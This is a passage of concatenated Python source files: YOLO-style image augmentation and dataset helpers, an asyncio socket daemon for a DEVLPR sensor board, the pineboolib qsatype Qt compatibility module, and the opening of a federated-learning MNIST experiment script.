perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
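# Quick illustration (added, not in the original file) of letterbox's contract:
# a 720x1280 BGR frame fitted into a 640 square with stride-32 padding. With
# auto=True the padding is reduced modulo the stride, so the output is the
# smallest stride-multiple rectangle containing the scaled image.
def _letterbox_sketch():
    frame = np.zeros((720, 1280, 3), dtype=np.uint8)       # h, w, c
    out, ratio, (dw, dh) = letterbox(frame, 640, stride=32)
    # r = min(640/720, 640/1280) = 0.5 -> new_unpad = (640, 360)
    # dw = 0, dh = 280 % 32 = 24 -> 12 px of padding on top and bottom
    assert out.shape == (384, 640, 3) and ratio == (0.5, 0.5)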
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
use_segments = any(x.any() for x in segments)
new = np.zeros((n, 4))
if use_segments: # warp segments
segments = resample_segments(segments) # upsample
for i, segment in enumerate(segments):
xy = np.ones((len(segment), 3))
xy[:, :2] = segment
xy = xy @ M.T # transform
xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine
# clip
new[i] = segment2box(xy, width, height)
else: # warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
targets = targets[i]
targets[:, 1:5] = new[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
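# Worked example (added): with the default thresholds, box_candidates keeps
# post-augmentation boxes that are at least 2 px on each side, retain more than
# 10% of their original area and have an aspect ratio below 20. Boxes are
# column vectors in x1y1x2y2 format.
#   box1 = np.array([[0.], [0.], [100.], [100.]])   # 100x100 before augment
#   box2 = np.array([[0.], [0.], [10.], [50.]])     # 10x50 after augment
#   box_candidates(box1, box2) -> array([False])    # area ratio 0.05 < 0.10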
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
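# Hedged usage sketch (not part of the original file): cutout modifies the image in place and
# returns only the labels that remain mostly visible; labels use (class, x1, y1, x2, y2) in pixels.
# img_demo = np.full((640, 640, 3), 114, dtype=np.uint8)
# labels_demo = np.array([[0, 100.0, 100.0, 200.0, 200.0]])
# labels_demo = cutout(img_demo, labels_demo)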
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int) # np.int is deprecated; the builtin int keeps the same behaviour
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
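# Hedged usage sketch (not part of the original file): run an 80/20 train/val split on a local
# dataset directory (the path is a placeholder) and read the resulting train list back.
# autosplit('../coco128', weights=(0.8, 0.2, 0.0))
# with open('../coco128/autosplit_train.txt') as f:
# train_images = f.read().splitlines()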
|
daemon.py
|
import asyncio
import multiprocessing as mp
import logging
from typing import Optional
from pydevlpr_protocol import DataFormatException, unwrap_packet, PacketType, DaemonSocket
from .serif import DevlprSerif
from .DaemonState import DaemonState
from .config import BOARDS, Board, ADDRESS
server = None
state: Optional[DaemonState] = None # Make sure to pass this to any other threads that need access to shared state
devlpr_serial: Optional[DevlprSerif] = None
logging.basicConfig(level=logging.INFO, format=f'%(levelname)s:{__name__}:%(message)s')
class DaemonController:
def __init__(self, board_id: str) -> None:
self.board_id = board_id
self.p: Optional[mp.Process] = None  # set in start(); lets stop() be called safely before start()
def start(self, block=False):
self.p = mp.Process(target=main, args=(self.board_id,))
self.p.start()
if block:
try:
self.p.join()
except KeyboardInterrupt:
self.p.kill()
def stop(self):
if self.p is not None and self.p.is_alive():
self.p.terminate()
def main(board_id: str):
try:
board = BOARDS[board_id]
except KeyError:
logging.warning("Invalid board ID, try get_board_ids() for options")
logging.info('Assuming DEVLPR')
board = BOARDS['DEVLPR']
asyncio.run(startup(board))
async def client_accept(sock: DaemonSocket) -> None:
"""Delegate and process incoming messages from a websocket connection."""
message = ' '
while len(message) > 0:
message = await sock.recv()
if len(message) > 0:
try:
command, data = unwrap_packet(message)
except DataFormatException:
continue # Handle an unexpected issue with the packet
if command == PacketType.SUBSCRIBE:
logging.info("Subscribing to {}".format(data))
try:
state.subscribe(sock, data)
except AttributeError:
logging.error("Failed to subscribe, Daemon State is None")
async def client_handler(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
"""Main function for socket connections. Holds the connection until the other side disconnects."""
logging.debug("Incoming Connection")
dsock = DaemonSocket(reader, writer)
logging.info("Connected to {0}".format(dsock.get_remote_address()))
try:
await client_accept(dsock)
except (BrokenPipeError, ConnectionError):
pass # Happens if we disconnect non-gracefully, but it's generally fine I think
finally:
logging.info("Disconnected from {0}".format(dsock.get_remote_address()))
try:
state.unsubscribe_all(dsock)
except AttributeError:
logging.error("Failed to unsubscribe_all, Daemon State is None")
async def startup(board: Board) -> None:
"""Initiallizes both the serial connection and the socket server. It then just hangs until everything is done internally before cleaning up."""
global server
global state
global devlpr_serial
# we'll want the asyncio event loop for subscriptions, some processing, and publishing
event_loop = asyncio.get_running_loop()
# the DaemonState publishes on state changes, so it needs a reference to the event loop
state = DaemonState(event_loop, board)
# we initialize our serial connection, which is managed on a separate thread
devlpr_serial = DevlprSerif(board)
devlpr_serial.init_serial(state)
# start a server, waiting for incoming subscribers to data (pydevlpr and other libraries)
server = await asyncio.start_server(client_handler, ADDRESS[0], ADDRESS[1])
try:
logging.debug("Started Listening")
await server.serve_forever()
except (asyncio.exceptions.CancelledError):
logging.debug("Closing Server")
await server.wait_closed()
devlpr_serial.deinit_serial()
def shutdown() -> None:
"""Manually closes out the server. Most of the time you don't need to do this because it should close when you exit the program."""
global server
global devlpr_serial
try:
if server is not None and server.is_serving():
server.close()
# asyncio.run_coroutine_threadsafe(server.wait_closed(), asyncio.get_event_loop())
except:
pass
try:
devlpr_serial.deinit_serial()
except AttributeError:
logging.warning("Serial couldn't close because devlpr_serial is already None")
except:
pass # not even sure this is necessary
# TODO this should all probably be part of an object rather than global state
def _get_state():
global state
return state
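# Hedged usage sketch (not part of the original file): run the daemon in a child process and
# stop it again; "DEVLPR" is assumed to be a valid key in config.BOARDS.
# controller = DaemonController("DEVLPR")
# controller.start(block=False) # spawns main() in a separate process
# ... clients may now connect to the server at config.ADDRESS ...
# controller.stop()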
|
qsatype.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os, fnmatch, re
import datetime, weakref
from lxml import etree
from io import StringIO
from PyQt5 import QtCore, QtGui, QtWidgets
# Load the whole Qt API so it is visible.
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtCore import QIODevice
from pineboolib import qsaglobals
from pineboolib import flcontrols
from pineboolib.fllegacy import FLFormSearchDB as FLFormSearchDB_legacy
from pineboolib.flcontrols import FLTable, QLineEdit
from pineboolib.fllegacy import FLSqlQuery as FLSqlQuery_Legacy
from pineboolib.fllegacy import FLSqlCursor as FLSqlCursor_Legacy
from pineboolib.fllegacy import FLTableDB as FLTableDB_Legacy
from pineboolib.fllegacy import FLUtil as FLUtil_Legacy
from pineboolib.fllegacy import FLReportViewer as FLReportViewer_Legacy
from pineboolib.utils import filedir
from pineboolib import decorators
import traceback
from PyQt5.Qt import QWidget
class StructMyDict(dict):
def __getattr__(self, name):
try:
return self[name]
except KeyError as e:
raise AttributeError(e)
def __setattr__(self, name, value):
self[name] = value
def Function(args, source):
# Read the QS code embedded in "source",
# assuming it is an anonymous function of the form:
# -> function($args) { source }
# compile the function and return a callable
qs_source = """
function anon(%s) {
%s
} """ % (args,source)
print("Compilando QS en línea: ", qs_source)
from pineboolib.flparser import flscriptparse
from pineboolib.flparser import postparse
from pineboolib.flparser.pytnyzer import write_python_file, string_template
import io
prog = flscriptparse.parse(qs_source)
tree_data = flscriptparse.calctree(prog, alias_mode = 0)
ast = postparse.post_parse(tree_data)
tpl = string_template
f1 = io.StringIO()
write_python_file(f1,ast,tpl)
pyprog = f1.getvalue()
print("Resultado: ", pyprog)
glob = {}
loc = {}
exec(pyprog, glob, loc)
# ... and the worst part is that it works. W-T-F.
return loc["anon"]
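# Hedged usage sketch (not part of the original file): compiles a tiny anonymous QS function at
# runtime; the exact QS syntax accepted depends on pineboolib.flparser.
# suma = Function("a, b", "return a + b;")
# suma(2, 3) # expected: 5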
def Object(x=None):
if x is None: x = {}
return StructMyDict(x)
#def Array(x=None):
#try:
#if x is None: return {}
#else: return list(x)
#except TypeError:
#return [x]
class Array(object):
dict_ = None
key_ = None
def __init__(self, data = None):
if not data:
self.dict_ = {}
elif isinstance(data, int):
self.dict_ = {} # dimensions are zero for now
else:
self.dict_ = data
def __setitem__(self, key, value):
#if isinstance(key, int):
#key = str(key)
self.dict_[key] = value
def __getitem__(self, key):
#if isinstance(key, int):
#key = str(key)
#print("QSATYPE.DEBUG: Array.getItem() " ,key, self.dict_[key])
return self.dict_[key]
def __getattr__(self, k):
if k == 'length':
return len(self.dict_)
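# Hedged usage sketch (not part of the original file): Array behaves like a dict exposing a
# QS-style "length" attribute.
# arr = Array()
# arr[0] = "first"
# arr["key"] = "second"
# arr.length # expected: 2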
def Boolean(x=False): return bool(x)
def FLSqlQuery(*args):
#if not args: return None
query_ = FLSqlQuery_Legacy.FLSqlQuery(*args)
return query_
def FLUtil(*args):
return FLUtil_Legacy.FLUtil(*args)
def AQUtil(*args):
return FLUtil_Legacy.FLUtil(*args)
def FLSqlCursor(action=None):
if action is None: return None
return FLSqlCursor_Legacy.FLSqlCursor(action)
def FLTableDB(*args):
if not args: return None
return FLTableDB_Legacy.FLTableDB(*args)
FLListViewItem = QtWidgets.QListView
QTable = FLTable
Color = QtGui.QColor
QColor = QtGui.QColor
QDateEdit = QtWidgets.QDateEdit
@decorators.NotImplementedWarn
def FLPosPrinter(*args, **kwargs):
class flposprinter:
pass
return flposprinter()
@decorators.BetaImplementation
def FLReportViewer():
return FLReportViewer_Legacy.FLReportViewer()
class FLDomDocument(object):
parser = None
tree = None
root_ = None
string_ = None
def __init__(self):
self.parser = etree.XMLParser(recover=True, encoding='utf-8')
self.string_ = None
def setContent(self, value):
try:
self.string_ = value
if value.startswith('<?'):
value = re.sub(r'^\<\?.*?\?\>','', value, flags=re.DOTALL)
self.tree = etree.fromstring(value, self.parser)
#self.root_ = self.tree.getroot()
return True
except:
return False
@decorators.NotImplementedWarn
def namedItem(self, name):
return True
def toString(self, value = None):
return self.string_
@decorators.NotImplementedWarn
def FLCodBar(*args, **kwargs):
class flcodbar:
def nameToType(self, name):
return name
def pixmapError(self):
return QtGui.QPixmap()
def pixmap(self):
return QtGui.QPixmap()
def validBarcode(self):
return None
return flcodbar()
def print_stack(maxsize=1):
for tb in traceback.format_list(traceback.extract_stack())[1:-2][-maxsize:]:
print(tb.rstrip())
def check_gc_referrers(typename, w_obj, name):
import threading, time
def checkfn():
import gc
time.sleep(2)
gc.collect()
obj = w_obj()
if not obj: return
# TODO: If you see the message below, it means that "something" has kept
# ..... a reference to a form (or similar) that prevents it from being destroyed
# ..... when it is no longer used. As a result its connects are not destroyed either,
# ..... and they keep being called against the old code and fail.
print("HINT: Objetos referenciando %r::%r (%r) :" % (typename, obj, name))
for ref in gc.get_referrers(obj):
if isinstance(ref, dict):
x = []
for k,v in ref.items():
if v is obj:
k = "(**)" + k
x.insert(0,k)
else:
x.append(k)
print(" - ", repr(x[:48]))
else:
if "<frame" in str(repr(ref)): continue
print(" - ", repr(ref))
threading.Thread(target = checkfn).start()
class FormDBWidget(QtWidgets.QWidget):
closed = QtCore.pyqtSignal()
cursor_ = None
def __init__(self, action, project, parent = None):
super(FormDBWidget, self).__init__(parent)
self._action = action
self.cursor_ = FLSqlCursor(action.name)
self._prj = project
self._class_init()
def __del__(self):
print("FormDBWidget: Borrando form para accion %r" % self._action.name)
def _class_init(self):
pass
def closeEvent(self, event):
can_exit = True
print("FormDBWidget: closeEvent para accion %r" % self._action.name)
check_gc_referrers("FormDBWidget:"+self.__class__.__name__, weakref.ref(self), self._action.name)
if hasattr(self, 'iface'):
check_gc_referrers("FormDBWidget.iface:"+self.iface.__class__.__name__, weakref.ref(self.iface), self._action.name)
del self.iface.ctx
del self.iface
if can_exit:
self.closed.emit()
event.accept() # let the window close
else:
event.ignore()
def child(self, childName):
try:
ret = self.findChild(QtWidgets.QWidget, childName)
except RuntimeError as rte:
# FIXME: Sometimes a control is looked up while it is already being deleted.
# ... apparently, closing the form does not disconnect its signals.
print("ERROR: Al buscar el control %r encontramos el error %r" % (childName,rte))
print_stack(8)
import gc
gc.collect()
print("HINT: Objetos referenciando FormDBWidget::%r (%r) : %r" % (self, self._action.name, gc.get_referrers(self)))
if hasattr(self, 'iface'):
print("HINT: Objetos referenciando FormDBWidget.iface::%r : %r" % (self.iface, gc.get_referrers(self.iface)))
ret = None
else:
if ret is None:
print("WARN: No se encontró el control %r" % childName)
#else:
# print("DEBUG: Encontrado el control %r: %r" % (childName, ret))
return ret
def cursor(self):
cursor = None
try:
if self.parentWidget():
cursor = getattr(self.parentWidget(),"cursor_", None)
if cursor and not cursor is self.cursor_ :
return cursor
except Exception:
# FIXME: Sometimes parentWidget existed but has since been deleted, which raises an error.
# ... in principle it should be safe to ignore the error.
pass
return self.cursor_
def FLFormSearchDB(name):
widget = FLFormSearchDB_legacy.FLFormSearchDB(name)
widget.setWindowModality(QtCore.Qt.ApplicationModal)
widget.load()
widget.cursor_.setContext(widget.iface)
return widget
class Date(object):
date_ = None
time_ = None
def __init__(self):
super(Date, self).__init__()
self.date_ = QtCore.QDate.currentDate()
self.time_ = QtCore.QTime.currentTime()
def toString(self, *args, **kwargs):
texto = "%s-%s-%sT%s:%s:%s" % (self.date_.toString("yyyy"),self.date_.toString("MM"),self.date_.toString("dd"),self.time_.toString("hh"),self.time_.toString("mm"),self.time_.toString("ss"))
return texto
def getYear(self):
return self.date_.year()
def getMonth(self):
return self.date_.month()
def getDay(self):
return self.date_.day()
def getHours(self):
return self.time_.hour()
def getMinutes(self):
return self.time_.minute()
def getSeconds(self):
return self.time_.second()
def getMilliseconds(self):
return self.time_.msec()
@decorators.NotImplementedWarn
class Process(object):
def __init__(self):
pass
@decorators.BetaImplementation
class RadioButton(QtWidgets.QRadioButton):
pass
class Dialog(QtWidgets.QDialog):
_layout = None
buttonBox = None
OKButtonText = None
cancelButtonText = None
OKButton = None
cancelButton = None
def __init__(self, title, f, desc=None):
# FIXME: f is not used here; it is the Qt window flags argument
super(Dialog, self).__init__()
self.setWindowTitle(title)
self.setWindowModality(QtCore.Qt.ApplicationModal)
self._layout = QtWidgets.QVBoxLayout()
self.setLayout(self._layout)
self.buttonBox = QtWidgets.QDialogButtonBox()
self.OKButton = QtWidgets.QPushButton("&Aceptar")
self.cancelButton = QtWidgets.QPushButton("&Cancelar")
self.buttonBox.addButton(self.OKButton, QtWidgets.QDialogButtonBox.AcceptRole)
self.buttonBox.addButton(self.cancelButton, QtWidgets.QDialogButtonBox.RejectRole)
self.OKButton.clicked.connect(self.accept)
self.cancelButton.clicked.connect(self.reject)
def add(self, _object):
self._layout.addWidget(_object)
def exec_(self):
if (self.OKButtonText):
self.OKButton.setText(self.OKButtonText)
if (self.cancelButtonText):
self.cancelButton.setText(self.cancelButtonText)
self._layout.addWidget(self.buttonBox)
return super(Dialog, self).exec_()
class GroupBox(QtWidgets.QGroupBox):
def __init__(self):
super(GroupBox, self).__init__()
self._layout = QtWidgets.QHBoxLayout()
self.setLayout(self._layout)
def add(self, _object):
self._layout.addWidget(_object)
class CheckBox(QtWidgets.QCheckBox):
pass
class Dir(object):
path_ = None
home = None
def __init__(self, path):
self.path_ = path
self.home = filedir("..")
def entryList(self, patron):
p = os.walk(self.path_)
retorno = []
for file in os.listdir(self.path_):
if fnmatch.fnmatch(file, patron):
retorno.append(file)
return retorno
class File(QtCore.QFile):
fichero = None
mode = None
ReadOnly = QIODevice.ReadOnly
WriteOnly = QIODevice.WriteOnly
ReadWrite = QIODevice.ReadWrite
def __init__(self, rutaFichero):
self.fichero = rutaFichero
super(File, self).__init__(rutaFichero)
#def open(self, mode):
# super(File, self).open(self.fichero, mode)
def read(self):
in_ = QTextStream(self)
return in_.readAll()
|
federated_learning_keras_low_power_PS_MNIST_crossentropy.py
|
from DataSets import MnistData
from DataSets_task import MnistData_task
from consensus.consensus_v3 import CFA_process
from consensus.parameter_server_v2 import Parameter_Server
# use only for consensus, PS only for energy efficiency
# from ReplayMemory import ReplayMemory
import numpy as np
import os
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras import models
import argparse
import warnings
import glob
import datetime
import scipy.io as sio
# import multiprocessing
import threading
import math
from matplotlib.pyplot import pause
import time
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser()
parser.add_argument('-resume', default=0, help="set 1 to resume from a previous simulation, 0 to start from the beginning", type=float)
parser.add_argument('-PS', default=1, help="set 1 to enable PS server and FedAvg, set 0 to disable PS", type=float)
parser.add_argument('-consensus', default=0, help="set 1 to enable consensus, set 0 to disable", type=float)
parser.add_argument('-mu', default=0.01, help="sets the learning rate for all setups", type=float)
parser.add_argument('-eps', default=1, help="sets the mixing parameters for model averaging (CFA)", type=float)
parser.add_argument('-target', default=0.2, help="sets the target loss to stop federation", type=float)
parser.add_argument('-K', default=30, help="sets the number of network devices", type=int)
parser.add_argument('-Ka', default=20, help="sets the number of active devices per round in FA (<= K)", type=int)
parser.add_argument('-N', default=1, help="sets the max. number of neighbors per device per round in CFA", type=int)
parser.add_argument('-Ka_consensus', default=20, help="sets the number of active devices for consensus", type=int)
parser.add_argument('-samp', default=500, help="sets the number of samples per device", type=int)
parser.add_argument('-noniid_assignment', default=0, help=" set 0 for iid assignment, 1 for non-iid random", type=int)
parser.add_argument('-run', default=0, help=" set the run id", type=int)
parser.add_argument('-random_data_distribution', default=0, help=" set 0 for fixed distribution, 1 for time-varying", type=int)
parser.add_argument('-batches', default=5, help="sets the number of batches per learning round", type=int)
parser.add_argument('-batch_size', default=100, help="sets the batch size per learning round", type=int)
parser.add_argument('-graph', default=6, help="sets the input graph: 0 for default graph, >0 uses the input graph in vGraph.mat, and choose one graph from the available adjacency matrices", type=int)
parser.add_argument('-modelselection', default=0, help="sets the model: 0 for lenet-1", type=int)
args = parser.parse_args()
devices = args.K # NUMBER OF DEVICES
active_devices_per_round = args.Ka
max_epochs = 200
condition = args.modelselection
if args.consensus == 1:
federated = True
parameter_server = False
elif args.PS == 1:
federated = False
parameter_server = True
else: # CL: CENTRALIZED LEARNING ON DEVICE 0 (DATA CENTER)
federated = False
parameter_server = False
################# consensus/PS: create the transmission scheduling matrix ################
scheduling_tx = np.zeros((devices, max_epochs*2), dtype=int)
if parameter_server and not federated:
indexes_tx = np.zeros((args.Ka, max_epochs*2), dtype=int)
for k in range(max_epochs*2):
# inds = np.random.choice(devices, args.Ka, replace=False)
sr = devices - args.Ka + 1
sr2 = k % sr
inds = np.arange(sr2, args.Ka + sr2)
scheduling_tx[inds, k] = 1
indexes_tx[:,k] = inds
elif not parameter_server and federated:
indexes_tx = np.zeros((args.Ka_consensus, max_epochs*2), dtype=int)
for k in range(max_epochs*2):
# inds = np.random.choice(devices, args.Ka_consensus, replace=False)
sr = devices - args.Ka_consensus + 1
sr2 = k % sr
inds = np.arange(sr2, args.Ka_consensus + sr2)
scheduling_tx[inds, k] = 1
indexes_tx[:, k] = inds
###########################################################################
if active_devices_per_round > devices:
active_devices_per_round = devices
target_loss = args.target
# Configuration parameters for the whole setup
seed = 42
# batch_size = 5 # Size of batch taken from replay buffer
batch_size = args.batch_size
number_of_batches = args.batches
training_set_per_device = args.samp # NUMBER OF TRAINING SAMPLES PER DEVICE
validation_train = 60000 # VALIDATION and training DATASET size
validation_test = 10000
if (training_set_per_device > validation_train/args.K):
training_set_per_device = math.floor(validation_train/args.K)
print(training_set_per_device)
if batch_size > training_set_per_device:
batch_size = training_set_per_device
# if batch_size*number_of_batches > training_set_per_device:
# number_of_batches = math.floor(training_set_per_device/batch_size)
# number_of_batches = int(training_set_per_device/batch_size)
# number_of_batches = args.batches
number_of_batches_for_validation = int(validation_test/batch_size)
print("Number of batches for learning {}".format(number_of_batches))
max_lag = 1 # consensus max delay (2 = max 2 epochs)
refresh_server = 1 # refresh interval for global server updates (in sec)
n_outputs = 10 # 10 classes (MNIST digits)
validation_start = 1 # epoch at which validation starts
# Using huber loss for stability
loss_function = keras.losses.Huber()
# save scheduling format
# dict_0 = {"scheduling": scheduling_tx, "devices_scheduling": indexes_tx}
# sio.savemat("results/matlab/CFA_scheduling_devices_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}.mat".format(devices, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run), dict_0)
def get_noniid_data(total_training_size, devices, batch_size):
samples = np.random.randint(batch_size, total_training_size - batch_size * (devices - 1) + 1,
devices) # draw random sizes (np.random.random_integers is deprecated; randint's upper bound is exclusive)
samples = samples / np.sum(samples, axis=0) * total_training_size # force them to sum to totals
# Ignore the following if you don't need integers
samples = np.round(samples) # transform them into integers
remainings = total_training_size - np.sum(samples, axis=0) # check if there are corrections to be done
step = 1 if remainings > 0 else -1
